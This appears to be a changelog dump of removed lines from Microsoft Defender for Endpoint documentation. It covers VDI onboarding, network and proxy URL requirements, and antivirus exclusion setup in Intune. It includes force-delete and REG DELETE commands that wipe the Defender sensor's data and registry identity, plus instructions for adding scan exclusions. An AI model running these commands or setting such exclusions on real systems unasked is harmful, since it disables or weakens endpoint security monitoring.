- 2. Log on to device.
-
- 3. Log off from device.
-
- 4. Log on to device with another user.
-
- 5. Depending on the method you'd like to implement, follow the appropriate steps:
-
- - For single entry for each device: Check only one entry in Microsoft Defender portal.
- - For multiple entries for each device: Check multiple entries in Microsoft Defender portal.
-
-6. Click **Devices list** on the Navigation pane.
-
-7. Use the search function by entering the device name and select **Device** as search type.
-
-## For downlevel SKUs (Windows Server 2008 R2)
-
-> [!NOTE]
-> These instructions for other Windows server versions also apply if you are running the previous Microsoft Defender for Endpoint for Windows Server 2016 and Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the new unified solution are at [Server migration scenarios in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/server-migration).
-
-The following registry is relevant only when the aim is to achieve a 'Single entry for each device'.
-
-1. Set registry value to:
-
- ```console
- [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging]
- "VDI"="NonPersistent"
- ```
-
- or using command line:
-
- ```console
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging" /v VDI /t REG_SZ /d "NonPersistent" /f
- ```
-
-2. Follow the [server onboarding process](configure-server-endpoints.md).
-
-## Updating virtual desktop infrastructure (VDI) images (persistent or non-persistent)
-
-With the ability to easily deploy updates to VMs running in VDIs, we've shortened this guide to focus on how you can get updates on your machines quickly and easily. You no longer need to create and seal golden images on a periodic basis, as updates are expanded into their component bits on the host server and then downloaded directly to the VM when it's turned on.
-
-If you have onboarded the primary image of your VDI environment (SENSE service is running), then you must offboard and clear some data before putting the image back into production.
-
-1. [Offboard the machine](offboard-machines.md).
-2. Ensure the sensor is stopped by running the following command in a CMD window:
-
- ```console
- sc query sense
- ```
-
-3. Run the following commands in a CMD window::
-
- ```console
- del "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Cyber\*.*" /f /s /q
- REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection" /v senseGuid /f
- REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection" /v 7DC0B629-D7F6-4DB3-9BF7-64D5AAF50F1A /f
- REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\48A68F11-7A16-4180-B32C-7F974C7BD783" /f
- exit
- ```
-
-### Are you using a third party for VDIs?
-
-If you're deploying non-persistent VDIs through VMware instant cloning or similar technologies, make sure that your internal template VMs and replica VMs are not onboarded to Defender for Endpoint. If you onboard devices using the single entry method, instant clones that are provisioned from onboarded VMs might have the same senseGuid, and that can stop a new entry from being listed in the Device Inventory view (in the [Microsoft Defender portal](https://security.microsoft.com), choose **Assets** > **Devices**).
-
-If either the primary image, template VM, or replica VM are onboarded to Defender for Endpoint using the single entry method, it will stop Defender from creating entries for new non-persistent VDIs in the Microsoft Defender portal.
-
-Reach out to your third-party vendors for further assistance.
-
-## Other recommended configuration settings
-
-After onboarding devices to the service, it's important to take advantage of the included threat protection capabilities by enabling them with the following recommended configuration settings.
-
-### Next generation protection configuration
-
-The following configuration settings are recommended:
-
-#### Cloud Protection Service
--- Turn on cloud-delivered protection: Yes-- Cloud-delivered protection level: Not configured-- Defender Cloud Extended Timeout In Seconds: 20-
-#### Exclusions
--- Please review the FXLogix antivirus exclusion recommendations here: [Prerequisites for FSLogix](/fslogix/overview-prerequisites#file--folder-exclusions).-
-#### Real-time Protection
--- Turn on all settings and set to monitor all files-
-#### Remediation
--- Number of days to keep quarantined malware: 30-- Submit samples consent: Send all samples automatically-- Action to take on potentially unwanted apps: Enable-- Actions for detected threats:
- - Low threat: Clean
- - Moderate threat, High threat, Severe threat: Quarantine
-
-#### Scan
--- Scan archived files: Yes-- Use low CPU priority for scheduled scans: Not configured-- Disable catch-up full scan: Not configured-- Disable catchup quick scan: Not configured-- CPU usage limit per scan: 50-- Scan mapped network drives during full scan: Not configured-- Run daily quick scan at: 12 PM-- Scan type: Not configured-- Day of week to run scheduled scan: Not configured-- Time of day to run a scheduled scan: Not configured-- Check for signature updates before running scan: Yes-
-#### Updates
--- Enter how often to check for security intelligence updates: 8-- Leave other settings in default state-
-#### User experience
--- Allow user access to Microsoft Defender app: Not configured-
-#### Enable Tamper protection
--- Enable tamper protection to prevent Microsoft Defender being disabled: Enable-
-#### Attack surface reduction
--- Enable network protection: Test mode-- Require SmartScreen for Microsoft Edge: Yes-- Block malicious site access: Yes-- Block unverified file download: Yes-
-#### Attack surface reduction rules
--- Configure all available rules to Audit.-
-> [!NOTE]
-> Blocking these activities may interrupt legitimate business processes. The best approach is setting everything to audit, identifying which ones are safe to turn on, and then enabling those settings on endpoints which do not have false positive detections.
-
-## Related topics
--- [Onboard Windows devices using Group Policy](configure-endpoints-gp.md)-- [Onboard Windows devices using Microsoft Configuration Manager](configure-endpoints-sccm.md)-- [Onboard Windows devices using Mobile Device Management tools](configure-endpoints-mdm.md)-- [Onboard Windows devices using a local script](configure-endpoints-script.md)-- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)-
security Configure Environment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-environment.md
- Title: Configure your network environment to ensure connectivity with Defender for Endpoint service
-description: Learn how to configure your network environment to connect with the Defender for Endpoint service
-------- m365-security-- tier1-- Previously updated : 02/01/2024---
-# STEP 1: Configure your network environment to ensure connectivity with Defender for Endpoint service
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configureendpointsscript-abovefoldlink)
---
-Before you onboard devices to Defender for Endpoint, make sure your network is configured to connect to the service. The first step of this process involves adding URLs to the allowed domains list if your proxy server or firewall rules prevent access to Defender for Endpoint. This article also includes information about proxy and firewall requirements for older versions of Windows client and Windows Server.
-
-## Enable access to Microsoft Defender for Endpoint service URLs in the proxy server
-
-By default, if a proxy or firewall is blocking all traffic and allowing only specific domains, then add the domains listed in the downloadable sheet to the allowed domains list.
--
-The following downloadable spreadsheet lists the services and their associated URLs that your network must be able to connect. Ensure there are no firewall or network filtering rules to deny access for these URLs. Optionally, you may need to create an *allow* rule specifically for them.
--
-> [!NOTE]
-> (Applies to public preview)<br>
-> - As part of the preview, certain Defender for Endpoint services are consolidated behind the URL: `*.endpoint.security.microsoft.com`. You have the option to use the reduced set of URLs in Microsoft Defender XDR for Defender for Endpoint. You also have the new option of configuring allow lists using static Defender for Endpoint dedicated IP ranges. For more information, see [onboarding devices using streamlined method](configure-device-connectivity.md) and review the [updated list](https://go.microsoft.com/fwlink/?linkid=2248278) in the preceding table.<br>
-> - To use the new onboarding method, devices must meet specific prerequisites and use a new onboarding package. For more information, see [prerequisites](configure-device-connectivity.md#prerequisites). You can migrate previously onboarded devices. See, [migrating devices to streamlined connectivity](migrate-devices-streamlined.md
-).<br>
-> - Certain services are not included in this consolidation. You must verify that you maintain connectivity with the required services. For details on services **not** included in the consolidation, see the [streamlined URL sheet](https://go.microsoft.com/fwlink/?linkid=2248278) or [onboarding devices using streamlined method](configure-device-connectivity.md).
-> - Devices running the MMA agent are not supported under streamlined solution and must be onboarded using the down-level method. For a list of required URLs, see the MMA tab in the [streamlined URL list](https://go.microsoft.com/fwlink/?linkid=2248278). Devices running legacy Windows version 1607, 1703, 1709, or 1803 can onboard using the new onboarding package but still require a longer list of URLs. For more information, see the preceding table.
-
-<br>
-
-|Spreadsheet of domains list| Description|
-|--|--|
-| Microsoft Defender for Endpoint consolidated URL list (NEW - Streamlined) <br> | **IMPORTANT:** Currently in public preview. <br> Spreadsheet of consolidated URLs for streamlining device connectivity. <br>[Download the spreadsheet here.](https://go.microsoft.com/fwlink/?linkid=2248278)<br><br> **Applicable OS:** <br/>For complete list, see [streamlined connectivity](configure-device-connectivity.md#prerequisites). <br>- Windows 10 1809+<br>- Windows 11<br>- Windows Server 2019<br>- Windows Server 2022<br>- Windows Server 2012 R2, Windows Server 2016 R2 running [Defender for Endpoint modern unified solution](configure-server-endpoints.md) (requires installation through MSI). <br>- macOS supported versions running 101.23102.* + <br/>- Linux supported versions running 101.23102.* + <br><br> **Minimum component versions:**<br/>- Antimalware client: 4.18.2211.5<br/>- Engine: 1.1.19900.2<br/>- Security intelligence: 1.391.345.0<br/> - Xplat version: 101.23102.* +<br/>- Sensor/ KB version: >10.8040.*/ March 8, 2022+<br><br>If you are moving previously onboarded devices to the streamlined approach, see [Migrating device connectivity](migrate-devices-streamlined.md).
-|Microsoft Defender for Endpoint URL list for commercial customers (Standard)| Spreadsheet of specific DNS records for service locations, geographic locations, and OS for commercial customers. <p> [Download the spreadsheet here.](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx) <p> Microsoft Defender for Endpoint Plan 1 and Plan 2 share the same proxy service URLs.
-| Microsoft Defender for Endpoint URL list for Gov/GCC/DoD | Spreadsheet of specific DNS records for service locations, geographic locations, and OS for Gov/GCC/DoD customers. <br> [Download the spreadsheet here.](https://download.microsoft.com/download/6/e-urls-gov.xlsx) |
-
-> [!NOTE]
-> 1. Windows 10 version 1607, 1703, 1709, 1803 (RS1-RS4) are supported on the onboarding package but require a longer URL list (see updated URL sheet). These versions do not support reonboarding (must be fully offboarded first).
-> 2. Devices running on Windows 7, Windows 8.1, Windows Server 2008 R2 MMA, Servers not upgraded to Unified Agent (MMA) will need to continue using MMA onboarding method.
-
-If a proxy or firewall has HTTPS scanning (SSL inspection) enabled, exclude the domains listed in the above table from HTTPS scanning.
-In your firewall, open all the URLs where the geography column is WW. For rows where the geography column isn't WW, open the URLs to your specific data location. To verify your data location setting, see [Verify data storage location and update data retention settings for Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/data-retention-settings). Don't exclude the URL `*.blob.core.windows.net` from any kind of network inspection. Instead, exclude only the blob URLs that are specific to MDE and listed in the spreadsheet of domains list.
-
-> [!NOTE]
-> Applies to standard set of URLS: <br>
-> Windows devices running with version 1803 or earlier needs `settings-win.data.microsoft.com`. <br>
->
-> URLs that include v20 in them are only needed if you have Windows devices running version 1803 or later. For example, `us-v20.events.data.microsoft.com` is needed for a Windows device running version 1803 or later and onboarded to US Data Storage region.
->
-
-If a proxy or firewall is blocking anonymous traffic from the Defender for Endpoint sensor and it's connecting from system context, it's important to make sure anonymous traffic is permitted in your proxy or firewall for the previously listed URLs.
-
-> [!NOTE]
-> Microsoft does not provide a proxy server. These URLs are accessible via the proxy server that you configure.
-
->[!IMPORTANT]
-> In compliance with Defender for Endpoint security and compliance standards, your data will be processed and stored in accordance with your tenant's physical location. Based on client location, traffic may flow through any of these IP regions (which correspond to Azure datacenter regions). For more information, see [Data storage and privacy](/microsoft-365/security/defender-endpoint/data-storage-privacy).
-
-## Microsoft Monitoring Agent (MMA) - proxy and firewall requirements for older versions of Windows client or Windows Server
-
-> [!NOTE]
-> (Applies to public preview)<br>
-> Services using MMA-based solutions are not able to leverage the new streamlined connectivity solution (consolidated URL and option to use static IPs). For Windows Server 2016 and Windows Server 2012 R2, you will need to update to the new unified solution.
--
-The information in the list of proxy and firewall configuration information is required to communicate with Log Analytics agent (often referred to as Microsoft Monitoring Agent) for previous versions of Windows, such as Windows 7 SP1, Windows 8.1, and Windows Server 2008 R2*.
-
-|Agent Resource|Ports|Direction|Bypass HTTPS inspection|
-|--|--|--|--|
-|`*.ods.opinsights.azure.com`|Port 443|Outbound|Yes|
-|`*.oms.opinsights.azure.com`|Port 443|Outbound|Yes|
-|`*.blob.core.windows.net`|Port 443|Outbound|Yes|
-|`*.azure-automation.net`|Port 443|Outbound|Yes|
-
-> [!NOTE]
-> These connectivity requirements apply to the previous Microsoft Defender for Endpoint of Windows Server 2016, and Windows Server 2012 R2 that requires MMA. Instructions to onboard these operating systems with the new unified solution are at [Onboard Windows servers](configure-server-endpoints.md), or migrate to the new unified solution at [Server migration scenarios in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/server-migration).
-
-> [!NOTE]
-> As a cloud-based solution, the IP range can change. It's recommended, you move to DNS resolving setting.
-
-## Onboard devices without Internet access
-
-For devices with no direct internet connection, the use of a proxy solution is the recommended approach. For older Windows devices onboarded using the previous, MMA-based solution the use of the OMS gateway solution provides an alternative approach.
-
-> [!NOTE]
-> (Applies to public preview)<br>
-> With this preview, you can leverage firewall devices with static IP ranges. For more information, see: [Streamlined device connectivity](configure-device-connectivity.md) and [streamlined URL list](https://go.microsoft.com/fwlink/?linkid=2248278).
-
-For more information about onboarding methods, see the following articles:
--- [Onboard previous versions of Windows](/microsoft-365/security/defender-endpoint/onboard-downlevel)-- [Onboard servers to the Microsoft Defender for Endpoint service](/microsoft-365/security/defender-endpoint/configure-server-endpoints#windows-server-2008-r2-sp1-windows-server-2012-r2-and-windows-server-2016)-
-> [!IMPORTANT]
-> - Microsoft Defender for Endpoint is a Cloud security solution. "Onboard devices without Internet access" means that Internet access for the endpoints must be configured through a proxy. Microsoft Defender for Endpoint does not support endpoints without direct or proxy Internet access. System wide proxy configuration recommended.
-> - Windows or Windows Server in disconnected environments must be able to update Certificate Trust Lists offline via an internal file or web server.
-> - For more information about updating CTLs offline, see [Configure a file or web server to download the CTL files](/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn265983(v=ws.11)#configure-a-file-or-web-server-to-download-the-ctl-files).
-
-### Devices running Windows 10 or later, Windows Server 2012 R2 or later, Linux and macOS
-
-Depending on the operating system, the proxy to be used for Microsoft Defender for Endpoint can be configured automatically, typically by using autodiscovery or an autoconfig file, or statically specific to Defender for Endpoint services running on the device.
--- For Windows devices, see [Configure device proxy and Internet connectivity settings](/microsoft-365/security/defender-endpoint/configure-proxy-internet)-- For Linux devices, see [Configure Microsoft Defender for Endpoint on Linux for static proxy discovery](/microsoft-365/security/defender-endpoint/linux-static-proxy-configuration)-- For macOS devices, see [Microsoft Defender for Endpoint on Mac](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac#network-connections)-
-### Windows devices running the previous MMA-based solution
-
-> [!NOTE]
-> - An OMS gateway server cannot be used as proxy for disconnected Windows or Windows Server devices when configured via 'TelemetryProxyServer' registry or GPO.
-> - For Windows or Windows Server - while you may use TelemetryProxyServer, it must point to a standard proxy device or appliance.
--- Set up Azure Log Analytics (formerly known as OMS Gateway) to act as proxy or hub:-
-[Onboard previous versions of Windows](onboard-downlevel.md)
--
-> [!NOTE]
-> Any client that has no access to the internet cannot be onboarded to Microsoft Defender Endpoint. A client must either have access to the required URLs directly, or it must have access via a proxy or firewall.<br>
->As part of the streamlined preview, you can now leverage IP addresses as alternatives to certain Defender for Endpoint service URLs.
-
-## Confirm Microsoft Monitoring Agent (MMA) Service URL Requirements
-
- See the following guidance to eliminate the wildcard (*) requirement for your specific environment when using the Microsoft Monitoring Agent (MMA) for previous versions of Windows.
-
-1. Onboard a previous operating system with the Microsoft Monitoring Agent (MMA) into Defender for Endpoint (for more information, see [Onboard previous versions of Windows on Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2010326) and [Onboard Windows servers](configure-server-endpoints.md)).
-
-2. Ensure the machine is successfully reporting into the Microsoft Defender portal.
-
-3. Run the TestCloudConnection.exe tool from `C:\Program Files\Microsoft Monitoring Agent\Agent` to validate the connectivity, and to get the required URLs for your specific workspace.
-
-4. Check the Microsoft Defender for Endpoint URLs list for the complete list of requirements for your region (refer to the Service URLs [Spreadsheet](https://go.microsoft.com/fwlink/?linkid=2247417)).
-
- :::image type="content" source="../../media/defender-endpoint/admin-powershell.png" alt-text="This is admin PowerShell.":::
-
-The wildcards (\*) used in `*.ods.opinsights.azure.com`, `*.oms.opinsights.azure.com`, and `*.agentsvc.azure-automation.net` URL endpoints can be replaced with your specific Workspace ID. The Workspace ID is specific to your environment and workspace. It can be found in the Onboarding section of your tenant within the Microsoft Defender portal.
-
-The `*.blob.core.windows.net` URL endpoint can be replaced with the URLs shown in the "Firewall Rule: \*.blob.core.windows.net" section of the test results.
-
-> [!NOTE]
-> In the case of onboarding via Microsoft Defender for Cloud, multiple workspaces can be used. You will need to perform the TestCloudConnection.exe procedure on the onboarded machine from each workspace (to determine, if there are any changes to the *.blob.core.windows.net URLs between the workspaces).
-
-## Next step
-
-[STEP 2: Configure your devices to connect to the Defender for Endpoint service using a proxy](configure-proxy-internet.md)
security Configure Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-exclusions-microsoft-defender-antivirus.md
- Title: Configure custom exclusions for Microsoft Defender Antivirus
-description: You can exclude files (including files modified by specified processes) and folders from Microsoft Defender Antivirus scans.
- Previously updated : 01/02/2024------
-ms.audience: ITPro
---- m365-security-- tier2-- mde-ngp--
-# Configure custom exclusions for Microsoft Defender Antivirus
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus. However, if necessary, you can exclude files, folders, processes, and process-opened files from Microsoft Defender Antivirus scans. These types of exclusions are known as custom exclusions. This article describes how to define custom exclusions for Microsoft Defender Antivirus with Microsoft Intune and includes links to other resources for more information.
-
-Custom exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). Exclusions for process-opened files only apply to real-time protection.
-
-> [!TIP]
-> For a detailed overview of suppressions, submissions, and exclusions across Microsoft Defender Antivirus and Defender for Endpoint, see [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
-
-## Configure and validate exclusions
-
-> [!CAUTION]
-> Use Microsoft Defender Antivirus extensions sparingly. Make sure to review the information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
-
-If you're using Microsoft Intune to manage Microsoft Defender Antivirus or Microsoft Defender for Endpoint, use the following procedures to define exclusions:
--- [Manage antivirus exclusions in Intune (for existing policies)](#manage-antivirus-exclusions-in-intune-for-existing-policies)-- [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune)-
-If you're using another tool, such as Configuration Manager or Group Policy, or you want more detailed information about custom exclusions, see these articles:
--- [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)-- [Configure exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)-
-#### Manage antivirus exclusions in Intune (for existing policies)
-
-1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus**, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune).)
-
-2. Choose **Properties**, and next to **Configuration settings**, choose **Edit**.
-
-3. Expand **Microsoft Defender Antivirus Exclusions** and then specify your exclusions.
-
- - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list must be separated with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
- - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
- - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
-
-4. Choose **Review + save**, and then choose **Save**.
-
-#### Create a new antivirus policy with exclusions in Intune
-
-1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus** \> **+ Create Policy**.
-
-2. Select a platform (such as **Windows 10, Windows 11, and Windows Server**).
-
-3. For **Profile**, select **Microsoft Defender Antivirus exclusions**, and then choose **Create**.
-
-4. On the **Create profile** step, specify a name and description for the profile, and then choose **Next**.
-
-5. On the **Configuration settings** tab, specify your antivirus exclusions, and then choose **Next**.
-
- - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
- - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
- - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
-
-6. On the **Scope tags** tab, if you're using scope tags in your organization, specify scope tags for the policy you're creating. (See [Scope tags](/mem/intune/fundamentals/scope-tags).)
-
-7. On the **Assignments** tab, specify the users and groups to whom your policy should be applied, and then choose **Next**. (If you need help with assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).)
-
-8. On the **Review + create** tab, review the settings, and then choose **Create**.
-
-## Important points about exclusions
-
-Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you're confident aren't malicious.
-
-Exclusions directly affect the ability for Microsoft Defender Antivirus to block, remediate, or inspect events related to the files, folders, or processes that are added to the exclusion list. Custom exclusions can affect features that are directly dependent on the antivirus engine (such as protection against malware, [file IOCs](indicator-file.md), and [certificate IOCs](indicator-certificates.md)). Process exclusions also affect [network protection](network-protection.md) and [attack surface reduction rules](attack-surface-reduction.md). Specifically, a process exclusion on any platform causes network protection and ASR to be unable to inspect traffic or enforce rules for that specific process.
-
-Keep the following points in mind when you're defining exclusions:
--- Exclusions are technically a protection gap. Consider all your options when defining exclusions. See [Submissions, suppressions, and exclusions](defender-endpoint-antivirus-exclusions.md#submissions-suppressions-and-exclusions).--- Review exclusions periodically. Recheck and re-enforce mitigations as part of your review process.--- Ideally, avoid defining exclusions in an attempt to be proactive. For example, don't exclude something just because you think it might be a problem in the future. Use exclusions only for specific issues, such as those pertaining to performance or application compatibility that exclusions could mitigate.--- Review and audit changes to your list of exclusions. Your security team should preserve context around why a certain exclusion was added to avoid confusion later on. Your security team should be able to provide specific answers to questions about why exclusions exist.-
-## Audit antivirus exclusions on Exchange systems
-
-Microsoft Exchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange (see [Running Windows antivirus software on Exchange servers](/exchange/antispam-and-antimalware/windows-antivirus-software)). It's highly recommended to install these updates and make sure that AMSI is working properly. See [Microsoft Defender Antivirus security intelligence and product updates](microsoft-defender-antivirus-updates.md).
-
-Many organizations exclude the Exchange directories from antivirus scans for performance reasons. Microsoft recommends auditing Microsoft Defender Antivirus exclusions on Exchange systems and assessing whether exclusions can be removed without impacting performance in your environment to ensure the highest level of protection. Exclusions can be managed by using Group Policy, PowerShell, or systems management tools like Microsoft Intune.
-
-To audit Microsoft Defender Antivirus exclusions on an Exchange Server, run the **Get-MpPreference** command from an elevated PowerShell prompt. (See [Get-MpPreference](/powershell/module/defender/get-mppreference).)
-
-If exclusions can't be removed for the Exchange processes and folders, keep in mind that running a quick scan in Microsoft Defender Antivirus scans the Exchange directories and files, regardless of exclusions.
-
-## See also
--- [Microsoft Defender Antivirus exclusions on Windows Server 2016 and later](configure-server-exclusions-microsoft-defender-antivirus.md)-- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md)-- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md)-
security Configure Extension File Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-extension-file-exclusions-microsoft-defender-antivirus.md
- Title: Configure and validate exclusions based on extension, name, or location
-description: Exclude files from Microsoft Defender Antivirus scans based on their file extension, file name, or location.
-- Previously updated : 04/03/2024--------- m365-security-- tier2-- mde-ngp--
-# Configure and validate exclusions based on file extension and folder location
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-You can define exclusions for Microsoft Defender Antivirus that apply to [scheduled scans](schedule-antivirus-scans.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on, real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). **Generally, you don't need to apply exclusions**. If you do need to apply exclusions, then you can choose from the following:
--- Exclusions based on file extensions and folder locations (described in this article)-- [Exclusions for files that are opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)-
-> [!IMPORTANT]
-> Microsoft Defender Antivirus exclusions do apply to some Microsoft Defender for Endpoint capabilities, such as [attack surface reduction rules](attack-surface-reduction.md). Some Microsoft Defender Antivirus exclusions are applicable to some ASR rule exclusions. See [Attack surface reduction rules reference - Microsoft Defender Antivirus exclusions and ASR rules](attack-surface-reduction-rules-reference.md#microsoft-defender-antivirus-exclusions-and-asr-rules).
-> Files that you exclude using the methods described in this article can still trigger Endpoint Detection and Response (EDR) alerts and other detections.
-> To exclude files broadly, add them to the Microsoft Defender for Endpoint [custom indicators](manage-indicators.md).
-
-## Before you begin
-
-See [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md) before defining your exclusion lists.
-
-## Exclusion lists
-
-To exclude certain files from Microsoft Defender Antivirus scans, modify your exclusion lists. Microsoft Defender Antivirus includes many automatic exclusions based on known operating system behaviors and typical management files, such as those used in enterprise management, database management, and other enterprise scenarios and situations.
-
-> [!NOTE]
-> Exclusions apply to [potentially unwanted apps (PUA) detections](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md) as well.
-> Automatic exclusions apply only to Windows Server 2016 and later. These exclusions are not visible in the Windows Security app and in PowerShell.
-
-The following table lists some examples of exclusions based on file extension and folder location.
-
-|Exclusion|Examples|Exclusion list|
-||||
-|Any file with a specific extension|All files with the specified extension, anywhere on the machine. <br/><br/> Valid syntax: `.test` and `test`|Extension exclusions|
-|Any file under a specific folder|All files under the `c:\test\sample` folder|File and folder exclusions|
-|A specific file in a specific folder|The file `c:\sample\sample.test` only|File and folder exclusions|
-|A specific process|The executable file `c:\test\process.exe`|File and folder exclusions|
-
-## Characteristics of exclusion lists
--- Folder exclusions apply to all files and folders under that folder, unless the subfolder is a reparse point. Reparse point subfolders must be excluded separately.-- File extensions apply to any file name with the defined extension if a path or folder isn't defined.-
-## Important notes about exclusions based on file extensions and folder locations
--- Using wildcards such as the asterisk (\*) alters how exclusion rules are interpreted. See the section, [Use wildcards in the file name and folder path or extension exclusion lists](#use-wildcards-in-the-file-name-and-folder-path-or-extension-exclusion-lists) for important information about how wildcards work.--- Don't exclude mapped network drives. Specify the actual network path.--- Folders that are reparse points are created after the Microsoft Defender Antivirus service starts, and those that were added to the exclusion list aren't included. Restart the service by restarting Windows for new reparse points to be recognized as a valid exclusion target.--- Exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md), but not across all Defender for Endpoint capabilities. To define exclusions across Defender for Endpoint, use [custom indicators](manage-indicators.md).--- By default, local changes made to the lists (by users with administrator privileges, including changes made with PowerShell and WMI) are merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists take precedence when there are conflicts. In addition, exclusion list changes made with Group Policy are visible in the [Windows Security app](microsoft-defender-security-center-antivirus.md).--- To allow local changes to override managed deployment settings, [configure how locally and globally defined exclusions lists are merged](configure-local-policy-overrides-microsoft-defender-antivirus.md#merge-lists).-
-## Configure the list of exclusions based on folder name or file extension
-
-You can choose from several methods to define exclusions for Microsoft Defender Antivirus.
-
-### Use Intune to configure file name, folder, or file extension exclusions
-
-See the following articles:
--- [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure)-- [Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune](/intune/device-restrictions-windows-10#microsoft-defender-antivirus)-
-### Use Configuration Manager to configure file name, folder, or file extension exclusions
-
